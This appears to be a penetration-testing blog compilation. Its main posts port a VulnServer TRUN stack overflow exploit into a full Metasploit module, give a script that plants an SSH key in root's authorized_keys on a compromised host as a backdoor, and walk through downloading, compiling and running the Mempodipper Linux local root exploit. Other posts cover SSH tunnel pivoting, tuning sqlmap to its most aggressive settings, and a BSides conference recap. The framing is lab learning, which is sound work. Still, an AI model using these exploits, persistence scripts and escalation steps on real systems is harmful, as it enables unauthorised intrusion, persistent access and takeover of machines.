Porting VulnServer TRUN /.:/ exploit to Metasploit

Prerequisites: http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

BoF template used: https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

I followed the BoF tutorial using Python 🙂

The Python version of the exploit looks like this:

[cc lang="python"]
import socket
import struct

ret = struct.pack("<I", 0x625011AF)   # 625011AF: JMP ESP in essfunc.dll, little-endian (\xAF\x11\x50\x62)
nop = b"\x90" * 32                    # short NOP sled in front of the shellcode
shellcode = b"\xCC\xCC\xCC"           # INT3 placeholder: use your own shellcode, bad chars \x00\x0A\x0D
buffer = b"A" * 2003 + ret + nop + shellcode + b"D" * 636  # 2003 bytes of junk reach the saved return address

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.recv(1024)                          # read the vulnserver banner
s.send(b"TRUN /.:/" + buffer)
s.close()
[/cc]

To port this to Metasploit, first think about what kind of exploit it is: a remote Windows exploit. [cc lang="ruby"]class Metasploit3 < Msf::Exploit::Remote[/cc]
It talks to the target over a TCP socket, so the module mixes in the TCP client. [cc lang="ruby"]include Msf::Exploit::Remote::Tcp[/cc]
Vulnserver listens on port 9999 by default, so that becomes the default RPORT. [cc lang="ruby"]Opt::RPORT(9999)[/cc]
Then think about the elements of the buffer (the "sploit") 🙂
First the "TRUN /.:/" command, then the junk. In Metasploit the 2003 bytes of "A" become make_nops(target['Offset']), which does the same job of reaching the saved return address.
Next the return address that will land in EIP: 0x625011AF, a JMP ESP inside essfunc.dll. Because essfunc.dll ships with vulnserver and loads at a fixed base without ASLR or rebasing, the address is the same on every Windows version, which is why the target is called "Universal".
[cc lang=”ruby”]
‘Targets’ =>
[
[‘Windows XP Universal’,
{ ‘Ret’ => 0x625011af, ‘Offset’ => 2003 } ],
],
[/cc]
In the 'Payload' section we set Space, the number of bytes available for the shellcode, and the BadChars the encoder must avoid:
[cc lang=”ruby”]
‘Payload’ =>
{
‘Space’ => 900,
‘BadChars’ => “\x00\x0A\x0D”,
},
[/cc]
Then a short NOP sled. payload.encoded returns the payload already run through an encoder that avoids BadChars, and the encoder's decoder stub decodes the shellcode in place, so the sled is not needed for decoding. It costs 32 bytes and gives the JMP ESP a small margin in case the stack pointer is a few bytes off from where the shellcode starts, so it is kept as a safety net.
Space tells the framework how much room the encoded payload may take. The TRUN buffer has around 900 bytes after the return address, which is plenty for any Windows shellcode; Space must never exceed what the overflowed buffer actually has room for, and the module below uses a conservative 500.
This makes the final sploit
[cc lang=”ruby”]

sploit = ‘TRUN /.:/’ + junk + [target.ret].pack(‘V’) + make_nops(32) + payload.encoded

[/cc]
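A quick sanity check on the buffer layout before firing it at the target, as an added Python example that is not part of the original post or of the Metasploit module. It rebuilds the same TRUN buffer (offset 2003, JMP ESP at 0x625011AF, 32 NOPs, bad chars \x00\x0A\x0D, all from above), pads the shellcode to a fixed size so the overflow length does not change when the payload changes, and verifies that the return address lands exactly on the saved EIP slot and that no bad character is present anywhere in what goes over the wire. The 900-byte shellcode budget is the figure quoted above; it is an assumption about how much the TRUN handler accepts, not something this script measures.

```python
import struct

# Values taken from the exploit above.
OFFSET = 2003               # bytes of junk before the saved return address
RET = 0x625011AF            # JMP ESP in essfunc.dll
NOP_SLED = 32
BADCHARS = b"\x00\x0a\x0d"  # bytes the TRUN handler will not pass through intact
PREFIX = b"TRUN /.:/"
SPACE = 900                 # shellcode budget quoted in the post (assumed, not measured here)


def build_trun_buffer(shellcode, space=SPACE, offset=OFFSET, ret=RET, nop_sled=NOP_SLED):
    """Build PREFIX + junk + ret + NOP sled + shellcode, padded with filler to a fixed length.

    Keeping the total length constant means a 3-byte INT3 test payload and a
    400-byte reverse shell overflow the stack in exactly the same way."""
    if len(shellcode) > space:
        raise ValueError("shellcode is %d bytes, only %d available" % (len(shellcode), space))
    filler = b"D" * (space - len(shellcode))
    return PREFIX + b"A" * offset + struct.pack("<I", ret) + b"\x90" * nop_sled + shellcode + filler


def find_bad_chars(data, badchars=BADCHARS):
    """Return [(index, byte), ...] for every bad character found in data (empty list if clean)."""
    bad = set(bytearray(badchars))
    return [(i, b) for i, b in enumerate(bytearray(data)) if b in bad]


def check_layout(buf, offset=OFFSET, ret=RET, prefix=PREFIX):
    """True if the four bytes at the EIP slot decode (little-endian) to ret and the buffer has no bad chars."""
    start = len(prefix) + offset
    eip = struct.unpack("<I", buf[start:start + 4])[0]
    return eip == ret and not find_bad_chars(buf)


if __name__ == "__main__":
    test_payload = b"\xcc" * 3                   # INT3s, same placeholder as the exploit above
    buf = build_trun_buffer(test_payload)
    print("buffer length: %d, layout ok: %s" % (len(buf), check_layout(buf)))
    # A payload that happens to contain a bad byte is caught before it is sent.
    print("bad chars in a tainted payload:", find_bad_chars(b"\x90\x00\x90\x0a\x90"))
```

Run check_layout on the exact bytes you are about to send, not on the shellcode alone: the return address and the filler are just as capable of carrying a bad byte as the payload is.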
This makes the Metasploit module:

[cc lang="ruby"]
# Metasploit template from corelan.be
# BoF for vulnserver thegreycorner.com
# Metasploit 4-era template: current framework versions drop the
# require 'msf/core' line and name the class MetasploitModule.
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote # a remote exploit

  include Msf::Exploit::Remote::Tcp # uses a TCP connection

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Vulnserver stack overflow',
      'Description'    => %q{
        This module exploits a stack overflow in the TRUN command of vulnserver.
      },
      'Author'         => [ 'Stephen Bradshaw', 'Duncan Winfrey' ],
      'Version'        => '$Revision: 9999 $',
      'References'     =>
        [
          # reference types must be ones the framework knows, e.g. URL, CVE, OSVDB
          [ 'URL', 'http://www.thegreycorner.com/p/vulnserver.html' ],
          [ 'URL', 'http://tinyurl.com/64s3je4' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Universal', { 'Ret' => 0x625011af, 'Offset' => 2003 } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false
    ))

    register_options(
      [
        Opt::RPORT(9999)
      ], self.class)
  end

  def exploit
    connect

    junk   = make_nops(target['Offset'])   # 2003 bytes to reach the saved return address
    sploit = 'TRUN /.:/' + junk + [target.ret].pack('V') + make_nops(32) + payload.encoded
    sock.put(sploit)

    handler
    disconnect
  end

end
[/cc]

Then save the module as vun_server_bof.rb under the exploits tree: /opt/metasploit/msf3/modules/exploits/windows/misc on the BackTrack install used here, or ~/.msf4/modules/exploits/windows/misc/ on any current Metasploit, followed by reload_all in msfconsole.

Then tested it out 😀

Backdoor Linux using SSH keys

In the Penetration Testing with BackTrack labs, /etc/passwd on a compromised box is often full of other students' usernames. That is not stealthy at all, and on a real pentest every extra account is another weak point someone else can use.

It is far easier to add your own SSH key to /root/.ssh/authorized_keys.

First create your key pair with the command below and hit enter a few times (use a dedicated key for the engagement rather than your personal one):

$ ssh-keygen

This creates the private key id_rsa and the public key id_rsa.pub in your own ~/.ssh/ (so /root/.ssh/ when working as root on BackTrack).

Once created, append the single line in your id_rsa.pub to the end of the authorized_keys file on the compromised host.

This is usually /root/.ssh/authorized_keys; create the .ssh directory if it is missing. sshd's StrictModes (on by default) ignores the file unless .ssh is mode 700, authorized_keys is mode 600 and both are owned by root, so fix the permissions after editing. Root login also needs PermitRootLogin in sshd_config to be anything other than no; the current default, prohibit-password, still accepts keys.

Then you can just ssh -p 22 root@IP and you will be logged in as root.
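The authorized_keys step is where mistakes creep in when done by hand: a missing trailing newline glues your key onto the previous line, a second run leaves duplicate entries, and StrictModes silently ignores a file with the wrong mode. Below is an added Python example, not from the original post, that appends a key idempotently and enforces the permissions. The public key in it is a constructed placeholder with the right shape, not real key material; point ssh_dir at the target's /root/.ssh when you use it for real.

```python
import os
import stat
import tempfile

# Key types an authorized_keys entry can start with (after any options such as from="...").
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

# Constructed placeholder: the blob is not a real key, it only has the right shape for the demo.
EXAMPLE_PUBKEY = ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYMATERIALxxxxxxxxxxxxxxxx "
                  "pentest@attacker")


def key_id(line):
    """(type, base64 blob) of an authorized_keys line, ignoring options and the trailing comment."""
    parts = line.split()
    for i, tok in enumerate(parts):
        if tok in KEY_TYPES and i + 1 < len(parts):
            return (tok, parts[i + 1])
    return (line.strip(),)


def add_authorized_key(pubkey_line, ssh_dir):
    """Append pubkey_line to ssh_dir/authorized_keys unless the same key is already present.

    Creates the directory if needed and enforces the 0700/0600 modes that sshd's
    StrictModes requires. Returns True if the key was added, False if it was there."""
    pubkey_line = pubkey_line.strip()
    if key_id(pubkey_line) == (pubkey_line,):
        raise ValueError("not a public key line: %r" % pubkey_line)
    if not os.path.isdir(ssh_dir):
        os.makedirs(ssh_dir)
    os.chmod(ssh_dir, 0o700)
    path = os.path.join(ssh_dir, "authorized_keys")
    content = ""
    if os.path.exists(path):
        with open(path) as f:
            content = f.read()
    present = {key_id(l) for l in content.splitlines()
               if l.strip() and not l.lstrip().startswith("#")}
    added = key_id(pubkey_line) not in present
    if added:
        with open(path, "a") as f:
            if content and not content.endswith("\n"):
                f.write("\n")          # never glue our key onto a last line missing its newline
            f.write(pubkey_line + "\n")
    os.chmod(path, 0o600)
    return added


def authorized_keys_ok(ssh_dir):
    """True if directory and file carry the modes sshd accepts under StrictModes."""
    path = os.path.join(ssh_dir, "authorized_keys")
    dir_mode = stat.S_IMODE(os.stat(ssh_dir).st_mode)
    file_mode = stat.S_IMODE(os.stat(path).st_mode)
    return dir_mode == 0o700 and file_mode == 0o600


def demo():
    """Exercise the helpers in a scratch directory standing in for /root/.ssh; returns what was observed."""
    ssh_dir = os.path.join(tempfile.mkdtemp(), ".ssh")
    first = add_authorized_key(EXAMPLE_PUBKEY, ssh_dir)                 # True: key written
    second = add_authorized_key(EXAMPLE_PUBKEY, ssh_dir)                # False: already present
    renamed = EXAMPLE_PUBKEY.rsplit(" ", 1)[0] + " renamed@key"         # same key, different comment
    third = add_authorized_key(renamed, ssh_dir)                        # False: comment is ignored
    with open(os.path.join(ssh_dir, "authorized_keys")) as f:
        lines = f.read().count("\n")
    return first, second, third, lines, authorized_keys_ok(ssh_dir)


if __name__ == "__main__":
    print(demo())   # (True, False, False, 1, True)
```

Ownership is not handled above because the script is meant to run as the account whose .ssh it touches; if you drop it in as root via another user's shell, chown the directory and file to root as well, or StrictModes will still reject them.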

 

Simple port killing bash script

Sometimes a port is left listening by a process that was not properly killed. This simple bash script kills whatever owns the port. netstat is deprecated on modern distributions: ss -tulpn takes the same flags, and fuser -k 9999/tcp does the whole job in one command.
[cc lang="bash"]
#!/bin/bash
# Kill the process listening on the given TCP/UDP port (run as root so netstat shows every PID).
killport="$1"
[[ "$killport" =~ ^[0-9]+$ ]] || { echo "usage: $0 <port>" >&2; exit 1; }
# Column 4 of netstat -tulpn is the local address; anchor on ":<port>$" so 80 does not match 8080,
# then pull the PID out of the "PID/Program" field, which is the last column for TCP and UDP alike.
pids=$(netstat -tulpn 2>/dev/null | awk -v port="$killport" '$4 ~ (":" port "$") {for (i = 1; i <= NF; i++) if ($i ~ /^[0-9]+\//) {split($i, a, "/"); print a[1]}}' | sort -u)
[ -n "$pids" ] || { echo "nothing listening on port $killport" >&2; exit 1; }
kill -9 $pids
[/cc]

Using HTTP proxy tools over SSH tunnels

When pivoting through a Linux box I wanted to run DirBuster through the SSH tunnel.

Unfortunately DirBuster does not support SOCKS5 proxies, so I used a tool called polipo (no longer maintained, but any HTTP-to-SOCKS bridge works the same way).

Polipo can be given a parent SOCKS5 proxy and then exposes a local HTTP proxy on a port you specify, so any tool that understands an HTTP proxy can ride the SOCKS tunnel.

I used the default polipo config file shipped with Tor, which already points at a SOCKS5 parent on 127.0.0.1:9050 and listens on port 8118.

To get it working:

$ polipo -c torconfig

Established listening socket on port 8118.

Then open the SOCKS tunnel to the pivot machine with ssh -D, which turns local port 9050 into the SOCKS5 listener polipo expects:

$ ssh -p 22 -D 127.0.0.1:9050 rootuser@192.168.1.31

Leave both console windows open and then

configure the tool you want to use with the HTTP proxy localhost:8118.
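For reference, the polipo settings that matter for this setup, written out as an added example rather than the Tor-shipped file the post used. The option names are polipo's own; the ports are the ones used above. Binding to 127.0.0.1 and restricting allowedClients matters because an HTTP proxy that forwards into a customer's network must not be reachable by anyone else on your subnet, and an empty diskCacheRoot stops polipo writing what you fetch through the pivot to disk.

```conf
# polipo.conf for riding a SOCKS5 tunnel opened with: ssh -D 127.0.0.1:9050 user@pivot
# (added example; option names are polipo's, ports match the post)

# listen only on loopback, on the port DirBuster will be pointed at
proxyAddress = "127.0.0.1"
proxyPort = 8118

# refuse anyone who is not a local tool
allowedClients = 127.0.0.1

# hand every request to the SOCKS5 listener that ssh -D created
socksParentProxy = "127.0.0.1:9050"
socksProxyType = socks5

# do not cache responses fetched through the pivot on disk
diskCacheRoot = ""

# polipo's own status web interface is not needed here
disableLocalInterface = true
```

Start it with polipo -c polipo.conf and check that the only "Established listening socket" line names 127.0.0.1:8118 before pointing any tool at it.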

 

How Unique Is Your Browser?

A web browser no longer simply downloads and renders HTML. Browsers expose many additional features a site can detect, such as the installed Flash and Java versions, the list of plugins and fonts, screen size and time zone, which together act as a very good fingerprint that can be used to track people without cookies.

In the data the EFF collected, a typical fingerprint carried at least 18.1 bits of entropy, meaning only about one in 286,777 browsers is expected to share it, and 83.6% of the browsers sampled were unique (94.2% of those with Flash or Java enabled). A fingerprint identifies a browser rather than a person, so on its own it is unlikely to stand as identification in court.

You can test your browser's uniqueness below:

https://panopticlick.eff.org/index.php

The Electronic Frontier Foundation has an excellent paper on browser uniqueness:

https://panopticlick.eff.org/browser-uniqueness.pdf

 

Configuring sqlmap

sqlmap is a great open-source SQL injection tool. I use it to aid my learning with the -v switch, which sets the output verbosity so you can see the SQL payloads sqlmap is sending; I usually set it to -v 3.

By default sqlmap tests for boolean-based blind SQL injection first. It is the technique most often found to work, but extracting data through it is very slow (roughly one bit of the result per request) and hard to follow in the output.

The full default order is boolean-based blind, error-based, UNION query, stacked queries, time-based blind: "BEUST" (newer releases add Q for inline queries, giving BEUSTQ).

I prefer UNION, error, stacked, blind, time: "UESBT", so the fast data-extraction techniques are tried first.

To change the default, open sqlmap.conf and change tech = BEUST to tech = UESBT.

This was line 236 in the version I used; the file changes between releases, so search for the key rather than trusting the line number. The command-line equivalent is --technique=UESBT.

sqlmap by default does not try all of its payloads, as some are too noisy or risky: higher levels add more injection points (cookies at level 2, User-Agent and Referer at level 3, Host at level 5) and more payload boundaries, and risk 3 adds OR-based boolean payloads that can alter every row if they land inside an UPDATE or DELETE.

This can mean that exploitable injections are missed. To avoid that, sqlmap can be configured to test for everything by raising the level and risk settings.

On line 195 you can change level = 1 to level = 5 (--level=5).

On line 202 you can change risk = 1 to risk = 3 (--risk=3).

By default sqlmap only tests 1 to 10 columns for UNION query SQL injection, which is too low for many wide tables; I raise it to 50.

You can change this on line 246: uCols = 1-50. The option is a range, not a single number (the command-line form is --union-cols=1-50).

There are loads of other options you can change in sqlmap; these are just a few 🙂
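Editing sqlmap.conf by line number is fragile, since the file changes between releases. Below is an added Python helper, not part of the original post or of sqlmap itself, that rewrites options by key name instead and checks the values before writing them: level 1-5, risk 1-3, technique letters drawn from BEUSTQ (Q, inline queries, exists only in newer sqlmap versions), and a hyphenated range for uCols, which is what --union-cols expects. The configuration excerpt inside the script is a constructed stand-in for the relevant lines of the real file.

```python
import re

# Constructed excerpt standing in for the relevant lines of sqlmap.conf (not the real file).
SAMPLE_CONF = """# sqlmap configuration excerpt (constructed for this example)
[Detection]
# Level of tests to perform (1-5)
level = 1
# Risk of tests to perform (1-3)
risk = 1

[Techniques]
# SQL injection techniques to use
tech = BEUST
# Range of columns to test for UNION query SQL injection
uCols =
"""

VALID_TECH = set("BEUSTQ")   # Boolean, Error, Union, Stacked, Time, inline Query


def validate(key, value):
    """Reject values sqlmap itself would refuse, so the error surfaces here rather than at scan time."""
    if key == "level" and not (value.isdigit() and 1 <= int(value) <= 5):
        raise ValueError("level must be 1-5")
    if key == "risk" and not (value.isdigit() and 1 <= int(value) <= 3):
        raise ValueError("risk must be 1-3")
    if key == "tech" and (not value or set(value) - VALID_TECH or len(set(value)) != len(value)):
        raise ValueError("tech must be a non-repeating selection of %s" % "".join(sorted(VALID_TECH)))
    if key == "uCols" and not re.match(r"^\d+-\d+$", value):
        raise ValueError("uCols must be a range such as 1-50")


def get_option(conf_text, key):
    """Current value of `key = value` in the config text, or None if the key is absent."""
    m = re.search(r"^%s[ \t]*=[ \t]*(.*)$" % re.escape(key), conf_text, re.M)
    return m.group(1).strip() if m else None


def set_option(conf_text, key, value):
    """Replace the value of exactly one `key = ...` line, leaving comments and other keys untouched."""
    validate(key, value)
    pattern = re.compile(r"^(%s[ \t]*=)[^\n]*$" % re.escape(key), re.M)
    new_text, count = pattern.subn(lambda m: "%s %s" % (m.group(1), value), conf_text)
    if count != 1:
        raise KeyError("expected exactly one '%s =' line, found %d" % (key, count))
    return new_text


def tune(conf_text):
    """Apply the four changes from the post: UESBT order, level 5, risk 3, union columns 1-50."""
    for key, value in (("tech", "UESBT"), ("level", "5"), ("risk", "3"), ("uCols", "1-50")):
        conf_text = set_option(conf_text, key, value)
    return conf_text


if __name__ == "__main__":
    tuned = tune(SAMPLE_CONF)
    for key in ("tech", "level", "risk", "uCols"):
        print("%s: %r -> %r" % (key, get_option(SAMPLE_CONF, key), get_option(tuned, key)))
```

To apply it to the real file, read sqlmap.conf into a string, pass it through tune() and write it back; the KeyError on a missing or duplicated key is deliberate, since a silently unchanged option is exactly the failure mode line-number editing has.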

 

BSides 2012

BSides was the first security conference I have attended. It was a stimulating (Club-Mate!) day packed full of all kinds of different infosec talks.

My day started at 2:40am making breakfast and inadvertently waking up a flatmate who was not amused. I then caught the coach to Victoria coach station and had a wet trek through London to the Barbican.

I attended the "breaking into security" talk from RandomStorm's Robin, which answered lots of questions about the best route into infosec. The talk was based on statistics Robin had collected online to try to get an unbiased view on what programming languages to learn and courses to go on to become a good penetration tester. The answer that surprised me was that a big percentage of people did not think you need to know how to program to be a good penetration tester, which is wrong. SLIDES

You can take the survey here

The next talk I was going to attend was cancelled, so I stayed and listened to the back-up talk from James Davis, which was on incident response incidents at Janet. The talk was amusing, with tales about malicious students phishing their own university pretending to be Student Finance. Another story was about Chinese ISPs sending weird DNS requests, apparently to cache websites because requests were timing out from some parts of China.

The digital forensics talk was cancelled and a back-up talk on true random number generation was the topic of the next talk. Maths can be quite boring, but the speaker Paco Hope made it entertaining. He talked about the common mistakes made when making random numbers, such as using a modulo operation so that random numbers not in the wanted range can be used, which introduces bias. Paco also talked about how important having a random seed is; as an example he talked about PartyPoker, which made an error with its random shuffling seeding as it used the server timestamp as the basis of the seed. PartyPoker had made its shuffling algorithm available, so in theory poker hands could be reverse engineered. The talk also mentioned keeping things simple, as overcomplicating number generation makes it easier to introduce bias. More on random numbers

Throughout the day I went around the stands and was lucky to get a fun t-shirt from MWR Infosec Labs, shown below.

In the afternoon I went to the MWR SAP slapping talk, which was totally new to me. The SAP systems talk was interesting, as Dave Hartley was trying to help make SAP systems more secure; he found numerous vulnerabilities in the demo SAP system, yet SAP refused to allow him access to full retail versions unless he paid. He did eventually get access to a SAP system for further research.

The next talk was on Satellite hacking which I will not write about as it was not allowed to be recorded.

The talk I went to next was my favourite of the day, as it was on HTML5, which brings new functionality to the web but also opens up a whole new array of security issues. The talk first went through the good parts of HTML5, then the not so good parts and innovative ways to exploit HTML5's new functions, such as a "botnet in the browser" that makes anyone temporarily part of a botnet just by loading a web page. Robert also talked about readily available tools from http://www.andlabs.org/tools.html and BeEF. He also demoed a PoC botnet that had DoS and HTML5 geolocation tracking. He also mentioned http://html5security.org/ as a good HTML5 resource.

The next talk I went to was from Arron "finux" Finnon on the design flaws of UPnP, which lets devices open ports on your home router as part of UPnP functionality. UPnP can be used for malicious purposes, as no authentication is required when requesting and receiving information using the protocol; it is designed to be seamless. It was also humorous, as in the audience were some BT engineers to whom Finux's talks have been giving a headache over the BT Home Hub's (lack of) UPnP security. Some links: UMAP, http://www.upnp-hacks.org/, UPnP Router Controller

The final talk I attended was on privilege escalation in web apps, but the talk put a lot of emphasis on showing clients a working exploit to demonstrate to them how serious the issue really is. He demoed that an XSS can be really serious when used as CSRF to add an admin account to WordPress (why does WordPress not use a captcha?). SLIDES

I attended the Conservatory shortly to listen to Glyn Wintle talk on writing JavaScript with only 8 characters to bypass XSS filters. Here is a snapshot of Coventry Uni students in a group talk.

 

Before I left I handed in my feedback form and received a YubiKey, which I am yet to configure but will do shortly.

The afterparty was fun 🙂 Talked to some very interesting people.

 

Linux kernel CVE-2012-0056 walk-through

This is a walk-through of using the recent Linux local root exploit for kernels >= 2.6.39 (32-bit and 64-bit) by zx2c4, Mempodipper. The bug is in the permission checks for writes to /proc/<pid>/mem: from 2.6.39 the kernel let a process write into another process's memory through that file with inadequate checks, so an unprivileged user can open /proc/self/mem, exec a setuid binary with the descriptor still open and overwrite the privileged process's code. The fix landed in mainline 3.2.2 and was backported by the distributions to their own kernels.

First you need to check what kernel the box is running:

$ uname -r

In my case BackTrack 5, which is based on Ubuntu, runs kernel 2.6.39.4, which is vulnerable.

I then added a normal user, as root, that I would use for the demo (-m creates its home directory):

# useradd -m test

I then logged back in with the test account.

Then I checked what privileges the account had:

$ groups test

which showed test was not a root-enabled account.

I then moved to the Desktop:

$ cd ~/Desktop

I then made a folder to store the exploit source in:

$ mkdir mempodipper

Then I moved into the mempodipper directory:

$ cd mempodipper

Then I downloaded the exploit source from zx2c4's git server:

$ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

Then compiled it (-w suppresses compiler warnings):

$ gcc mempodipper.c -w -o mempodipper

Then ran it:

$ ./mempodipper

It printed its progress as the exploit ran, and since it was successful it dropped me into a root shell:

# whoami

returned root, confirming that it worked.

I then added the test user to the admin group, which on Ubuntu grants sudo rights:

# adduser test admin

Adding user `test' to group `admin' ...

Adding user test to group admin

Done.

So from a plain test account you have got a full root account 😀

Then I verified that the user really had been added to the admin group:

# groups test

Source used to make this post and an in-depth technical explanation of the exploit: http://blog.zx2c4.com/749
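The first step above, deciding from uname -r whether the kernel is even in scope, is the part worth automating when you are looking at many hosts. The Python below is an added example, not zx2c4's code: it parses the release string and reports whether the version falls in the mainline window Mempodipper targets, 2.6.39 up to but not including 3.2.2, the release that shipped the fix. Treat the result as a hint only: distributions backport fixes without bumping the version number, so a kernel in range may already be patched, and the only definitive test is the PoC itself (or the distribution's changelog).

```python
import re
import platform

FIRST_AFFECTED = (2, 6, 39, 0)   # the release in which /proc/<pid>/mem became writable
FIXED_IN = (3, 2, 2, 0)          # mainline release carrying the fix (assumes mainline numbering)


def parse_kernel_release(release):
    """'2.6.39.4-generic' -> (2, 6, 39, 4); missing components are zero, suffixes are ignored."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def in_affected_range(release):
    """True if the version number alone places the kernel inside the CVE-2012-0056 window."""
    return FIRST_AFFECTED <= parse_kernel_release(release) < FIXED_IN


def describe(release):
    """One-line verdict for a release string, spelling out the backport caveat."""
    if in_affected_range(release):
        return "%s: in affected range by version (distro may have backported the fix)" % release
    return "%s: outside affected range" % release


if __name__ == "__main__":
    print(describe(platform.release()))   # the running kernel, same value as uname -r
    # Constructed release strings covering both sides of each boundary.
    for r in ("2.6.38-8-generic", "2.6.39.4", "3.0.0-12-generic", "3.2.1", "3.2.2", "3.3.0-rc1"):
        print(describe(r))
```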